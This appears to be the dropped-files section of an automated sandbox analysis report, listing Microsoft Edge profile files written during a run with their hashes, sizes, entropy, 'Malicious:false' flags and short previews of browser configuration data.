                                                                                                                                                                                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-6768FBDA-1F44.pma

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):4194304
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.44590958214845594
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3072:vfdcFqzSJeoXMY466Pkc+RnpvdP3wN8n0SYzqrJayqbg1HF:tcFleq46gkc+FN9n0SYzqrJayqbaH
                                                                                                                                                                                                                                                                                    MD5:1F54533CE555DAE9955CB0BCDEA1190D
                                                                                                                                                                                                                                                                                    SHA1:D0B24212620A82EB5EB19A0F48FDE59E41912CDB
                                                                                                                                                                                                                                                                                    SHA-256:22E16102EAB96D87D0F4EDE2A2958C9855E06DF09667F7BADE4DEEC51390492A
                                                                                                                                                                                                                                                                                    SHA-512:DDDB72A529D24D70BE379365289AED4C62FB68E7B3DCC04348D9D25BBD1AEB8E0A39C115FEB635C87F3AC797128789B7C2AC8E00B947D4CFC96FD81857259D3D
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:...@..@...@.....C.].....@..................................`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".luirqm20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J...I.r.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............(......................w..U?:K...G...W6.>.........."....."...24.."."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...u...V.S@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2........6......

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):280
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.132041621771752
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:FiWWltlApdeXKeQwFMYLAfJrAazlYBVP/Sh/JzvPWVcRVEVg3WWD5x1:o1ApdeaEqYsMazlYBVsJDu2ziy5
                                                                                                                                                                                                                                                                                    MD5:845CFA59D6B52BD2E8C24AC83A335C66
                                                                                                                                                                                                                                                                                    SHA1:6882BB1CE71EB14CEF73413EFC591ACF84C63C75
                                                                                                                                                                                                                                                                                    SHA-256:29645C274865D963D30413284B36CC13D7472E3CD2250152DEE468EC9DA3586F
                                                                                                                                                                                                                                                                                    SHA-512:8E0E7E8CCDC8340F68DB31F519E1006FA7B99593A0C1A2425571DAF71807FBBD4527A211030162C9CE9E0584C8C418B5346C2888BEDC43950BF651FD1D40575E
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:sdPC......................X..<EE..r/y..."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................fdb35e9f-12f5-40d5-8d50-87a9333d43a4............

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\1e43abed-783b-470b-b10c-cdb9113645ba.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                    MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                    SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                    SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                    SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\22db65d9-25fa-42c2-9880-193c2562df6d.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):115717
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                    MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                    SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                    SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                    SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\236031bf-3584-485f-84f2-fb22ef59b6ce.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):9713
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.111389311051109
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:stxkdpe+suwsZihUktAm8dbV+FAAQA66WkaFIMY1PZYJ:stxQlsuwfhEbGvQx6WkaTYw
                                                                                                                                                                                                                                                                                    MD5:3A53E70AEE624CE0A5C22B64DBF18739
                                                                                                                                                                                                                                                                                    SHA1:B3CDAF8CB376A4B8A67A1327AEBA3449E77CB8AB
                                                                                                                                                                                                                                                                                    SHA-256:A0E51D00F3DDB126443BB7A0A77CCD4D2290EF40AE48DE60AAE78BA7B67C5B72
                                                                                                                                                                                                                                                                                    SHA-512:9C9FF148A630EFE600B2657A40237B009DE5EC278836BBC187D17E56B55BFCC339B78A7FE6CB03B5AED164D54ECCBEC8F74A14452F6E5477631CAFA811CD9C5F
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379407068433583","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\32834b9a-04d9-41e5-90e7-79169733a193.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (17511), with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):17511
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.48771686632875
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:stxPGKSu4lsuwfh+xwFHybGvQwm6WkaTYw:sjOxuowfmvbG454aTYw
                                                                                                                                                                                                                                                                                    MD5:C2D56E6C62C4834DA041D509AD4CB909
                                                                                                                                                                                                                                                                                    SHA1:3FE4F0011AB92CFBAF9EBD5ABB91D8F1B8CAA898
                                                                                                                                                                                                                                                                                    SHA-256:11A562F87BE3F02A0256D6F538AFB50B51C3526E95B3C471C1971A198B42D616
                                                                                                                                                                                                                                                                                    SHA-512:7B550F1E239E6E8F210BE4138A9868E7D2FDC97A9B12F751082E9BB406C18CD31BF9726D4CD7582B2A899FE09DB453A1789354C9F78506FB7F2B166FE812A6E0
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379407068433583","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\3c67715b-71fc-4753-8507-e82a362d5dba.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):40504
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.5617298467447265
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:bqOVrn7pLGLhu4WPm4fl78F1+UoAYDCx9Tuqh0VfUC9xbog/OVDBa5qb7rwAXZGL:bqOVrhchu4WPm4fl7u1jauBaAbQAXZGL
                                                                                                                                                                                                                                                                                    MD5:0B1E1DCDA654ADAEF24A988516CCF8C3
                                                                                                                                                                                                                                                                                    SHA1:A1CD455FAED89AB52DF80EB8DDC32A01440DB5AA
                                                                                                                                                                                                                                                                                    SHA-256:F8EC59A7B0A76A76F01F8854BA8A21414A138A5AE75345473CEC237BBFBD507A
                                                                                                                                                                                                                                                                                    SHA-512:2854E87168CC7597357DD4E2BE2781534794D9EC12233683D8F70CCF1A24E69EFA12118FBED7A19A124F54542128730952D6DB407873863C6B9995A413B7FF1A
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379407067597279","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379407067597279","location":5,"ma

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\58835642-bfc7-42f8-915b-4ee410e2900a.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (17676), with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):17676
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.484229567163544
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:stxPGKSu4lsuwfh+xwFHybGvQwm6W7laTYw:sjOxuowfmvbG45daTYw
                                                                                                                                                                                                                                                                                    MD5:D262C592A8F792216A40603B298505D1
                                                                                                                                                                                                                                                                                    SHA1:F376203DB52706F18D266FA71D9AB4537C084279
                                                                                                                                                                                                                                                                                    SHA-256:64EC9D1A66EA787E4490B3B4925EB831B8102CBC462CAEDC19095306101089B2
                                                                                                                                                                                                                                                                                    SHA-512:1EDE4F178E1394B6F36D0B99CF7E169D540EFF3078C353545526D2EB27352DFE9A1C5955197AEB608F1D9744378933E5ADAC0A280B06ABD17B2B7314AD905C49
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379407068433583","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\5e2d80e7-587a-4b45-abdd-8de1c385f3b4.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):25012
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.568364574025481
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:bHYVq4WPm4fs78F1+UoAYDCx9Tuqh0VfUC9xbog/OVY5qQ7rwO66pctuI:bHYVq4WPm4fs7u1jaJAQQOotD
                                                                                                                                                                                                                                                                                    MD5:33DE49756168DACA4034B274C1401326
                                                                                                                                                                                                                                                                                    SHA1:6EB2200F212C83FD2E1E50F38944606BEA5438AF
                                                                                                                                                                                                                                                                                    SHA-256:0FD31E055BCBE9DB953C2561A3235B34E4E41FAC6D5A68248A4569408DF1ED35
                                                                                                                                                                                                                                                                                    SHA-512:84546116AD508CD382713263AFB6E6AC98F916462042FB35C87748FA99360D1DDCF439635621424B2D9B98F332AF324B6947065D41FF26A14F1944E4AADA73DF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379407067597279","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379407067597279","location":5,"ma

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\933be999-b2ed-4921-bb60-5d3bd85e4406.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                    MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                    SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                    SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                    SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000003.log

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):33
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                                                    MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                                                    SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                                                    SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                                                    SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:...m.................DB_VERSION.1

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\CURRENT (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\LOG

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):309
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.208902134584697
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:EIoR1923oH+Tcwtp3hBtB2KLl+Imc+q2P923oH+Tcwtp3hBWsIFUv:F1Yebp3dFLNmc+v4Yebp3eFUv
                                                                                                                                                                                                                                                                                    MD5:13FF7DE3908C58E36FF3FA7F8A50F52E
                                                                                                                                                                                                                                                                                    SHA1:4E078CDF958CC85D8A5B66F29DD7B89297FF07C9
                                                                                                                                                                                                                                                                                    SHA-256:E4EFE2081E460F7099A6B1D87CA14A70CB0C2155F67183FF1C52C9B92BE4AFA9
                                                                                                                                                                                                                                                                                    SHA-512:0CAE1798A217A37E9CD2092B5AFDF16BBDA60B7631541BD1C79828317671A8FE23879C5511E104A9E1EDA3F5B26F246F2513EDBCE39E31A1F196C950C4425534
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/23-00:57:52.550 1fec Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/12/23-00:57:52.704 1fec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):41
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                    MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                    SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                    SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                    SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                                                    Size (bytes):2163821
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.222867466424337
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24576:v+/PN8FofI/MXhZSihQgCmnVAEpENU2iOYcafbE2n:v+/PN8Gfx2mjF
                                                                                                                                                                                                                                                                                    MD5:CE336A7689D904676EF6D0751452B69F
                                                                                                                                                                                                                                                                                    SHA1:069320732550A5E489CB7DB18E06243E49DE2F46
                                                                                                                                                                                                                                                                                    SHA-256:BBD0C5712D7D161F689660D5F27DDB13CFA2B9EF6F137ABD9AD23A3B6F209FCC
                                                                                                                                                                                                                                                                                    SHA-512:0EE9C0600042ACC8BE060BDD9DDDFEF7B9064F374B100668DD5C481663D035E70CAE98819B76933E8D266ADDEF50D0E4C4CC156326C96DAFA4E022F4AB761E53
                                                                                                                                                                                                                                                                                    Malicious:false
